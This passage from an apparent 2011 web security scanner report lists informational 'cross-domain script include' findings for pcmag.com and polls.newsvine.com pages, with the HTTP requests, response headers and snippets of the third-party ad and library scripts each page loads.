<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.ziffdavis.com/js/betrad.js" type="text/javascript"></script>
...[SNIP]...
<div id="microAd">
<script src="http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1" type="text/javascript"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pcmag.com
Path:	/reviews\|http:/www.pcmag.com/category2/0,2806,24,00.asp\|http:/www.pcmag.com/category2/0,2806,9,00.asp\|http:/www.pcmag.com/category2/0,2806,4829,00.asp\|http:/www.pcmag.com/category2/0,2806,2201,00.asp\|office.microsoft.com\|www.healthline.com/$\|http:/www.terra.com.mx/default.htm\|http:/www.terra.com/$\|www.people.com/$\|http:/www.walmart.com/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1
http://common.ziffdavisinternet.com/js/s_code_remote.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.ziffdavis.com/js/betrad.js

Request

GET /reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 130460
Content-Type: text/html
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Expires: Sun, 30 Jan 2011 02:01:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 02:01:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

...[SNIP]...
</script>

<script language="JavaScript" src="http://common.ziffdavisinternet.com/js/s_code_remote.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.ziffdavis.com/js/betrad.js" type="text/javascript"></script>
...[SNIP]...
<div id="microAd">
<script src="http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1" type="text/javascript"></script>
...[SNIP]...

23.540. http://www.polls.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.541. http://www.polls.newsvine.com/_labs/archive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_labs/archive

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /_labs/archive HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 03:18:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 628172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.542. http://www.polls.newsvine.com/_nv/cms/backyard/greenhouse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/backyard/greenhouse

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.543. http://www.polls.newsvine.com/_nv/cms/backyard/tools previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/backyard/tools

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:58 GMT
Content-Length: 20666
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.544. http://www.polls.newsvine.com/_nv/cms/help/faq previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/help/faq

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:41 GMT
Content-Length: 19412
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.545. http://www.polls.newsvine.com/_nv/cms/info/codeOfHonor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/codeOfHonor

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:48 GMT
Content-Length: 22633
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.546. http://www.polls.newsvine.com/_nv/cms/info/companyInfo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/companyInfo

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:51 GMT
Content-Length: 19220
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.547. http://www.polls.newsvine.com/_nv/cms/info/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/contact

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:43 GMT
Content-Length: 20175
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.548. http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/copyrightPolicy

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:55 GMT
Content-Length: 21217
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
